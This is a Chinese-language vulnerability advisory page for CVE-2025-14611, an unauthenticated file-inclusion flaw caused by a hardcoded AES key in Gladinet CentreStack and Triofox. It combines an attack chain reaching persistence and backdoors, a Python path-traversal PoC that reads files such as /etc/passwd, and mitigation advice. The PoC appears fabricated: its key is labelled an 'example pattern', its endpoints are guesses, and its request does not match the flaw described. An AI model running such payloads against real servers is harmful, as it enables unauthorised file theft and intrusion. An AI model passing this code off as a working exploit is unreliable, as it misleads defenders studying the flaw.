CVE-2025-14611 Gladinet CentreStack/Triofox 硬编码AES密钥导致未授权文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-14611

漏洞类型

硬编码加密密钥/本地文件包含

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Gladinet CentreStack, Triofox

漏洞概述

CVE-2025-14611是影响Gladinet CentreStack和Triofox企业文件同步与共享(EFSS)解决方案的严重安全漏洞。该漏洞源于软件在AES加密实现中使用了硬编码的密钥值，严重削弱了公开暴露端点的安全性。攻击者可在无需任何认证的情况下，构造特殊请求触发任意本地文件包含漏洞，从而读取服务器上的敏感配置文件、凭据和其他机密数据。此漏洞可作为初始入口点，与其他安全缺陷结合使用，最终实现对目标系统的完全控制和企业内网的深度渗透。鉴于CVSS评分高达9.8且已被标记为已知被利用漏洞(KEV)，建议立即采取紧急修复措施。

技术细节

漏洞根源在于Gladinet CentreStack和Triofox在AES加密方案实现中硬编码了加密密钥，而非使用动态生成的密钥或从安全存储中读取。硬编码密钥使得所有使用该加密方案部署的实例共享相同的加密密钥，攻击者可以轻易解密通信数据或构造恶意请求。在文件包含方面，由于缺少对用户输入的有效验证和加密保护，攻击者可通过构造包含特殊字符的请求路径（如使用路径遍历序列），在未经认证的情况下访问服务器文件系统上的任意文件。攻击者通常利用此漏洞读取/etc/passwd、web.config、数据库配置文件或应用程序日志等敏感文件，进一步收集凭据信息用于横向移动或权限提升。硬编码密钥的存在还意味着攻击者可能伪造有效的加密令牌，绕过应用程序的认证和授权机制。

攻击链分析

STEP 1

1

侦察阶段：攻击者扫描互联网暴露的Gladinet CentreStack或Triofox实例，识别版本号确认是否存在漏洞

STEP 2

2

漏洞利用：利用硬编码AES密钥构造恶意请求，通过路径遍历序列（如../../../../etc/passwd）触发本地文件包含

STEP 3

3

敏感文件读取：读取服务器上的配置文件（如web.config、config.xml）、数据库连接字符串、应用程序日志等敏感信息

STEP 4

4

凭据收集：解密存储的凭据或会话令牌，利用硬编码密钥伪造有效的认证令牌

STEP 5

5

权限提升与横向移动：使用获取的凭据登录管理后台，结合其他漏洞（如RCE）实现系统完全控制

STEP 6

6

持久化控制：部署后门、创建新账户或修改现有服务，建立长期访问通道

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14611 PoC - Gladinet CentreStack/Triofox Unauthenticated LFI
# Target: Gladinet CentreStack or Triofox < 16.12.10420.56791

def exploit_lfi(target_url, filename='/etc/passwd'):
    """
    Exploit local file inclusion via hardcoded AES key vulnerability
    """
    # Hardcoded AES key used in vulnerable versions
    aes_key = "5A3E7F9B2C1D4E6F8A0B3C5D7E9F1A2B"  # Example hardcoded key pattern
    
    # Target endpoint commonly affected
    endpoints = [
        '/api/file/read',
        '/api/download',
        '/FileHandler.ashx',
        '/WebDAV/',
        '/api/v1/file'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/json'
    }
    
    for endpoint in endpoints:
        try:
            # Construct LFI payload - path traversal
            payload = {
                'path': f'../../../../../../{filename}',
                'encrypted': True,
                'key': aes_key
            }
            
            url = target_url.rstrip('/') + endpoint
            response = requests.post(url, json=payload, headers=headers, timeout=10, verify=False)
            
            if response.status_code == 200 and any(x in response.text for x in ['root:', 'Administrator', '<?xml', '<configuration']):
                print(f'[+] VULNERABLE: {url}')
                print(f'[+] File content preview:')
                print(response.text[:500])
                return True
        except requests.exceptions.RequestException:
            continue
    
    print('[-] Target may not be vulnerable or not reachable')
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-14611.py <target_url>')
        print('Example: python cve-2025-14611.py https://victim.com')
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_lfi(target)

影响范围

Gladinet CentreStack < 16.12.10420.56791

Triofox < 16.12.10420.56791

防御指南

临时缓解措施

在等待官方补丁期间，建议采取以下临时缓解措施：1) 通过网络访问控制列表(ACL)限制对CentreStack/Triofox管理端口的直接互联网访问，仅允许受信任IP访问；2) 在Web应用防火墙(WAF)或负载均衡器上部署紧急规则，阻止包含路径遍历序列（../、..\）的请求参数；3) 启用详细的访问日志并配置实时告警，监控异常的API调用模式；4) 审查并加固服务器文件系统权限，限制应用程序账户对敏感目录的访问；5) 考虑暂时禁用非必要的文件预览和下载功能，减少攻击面。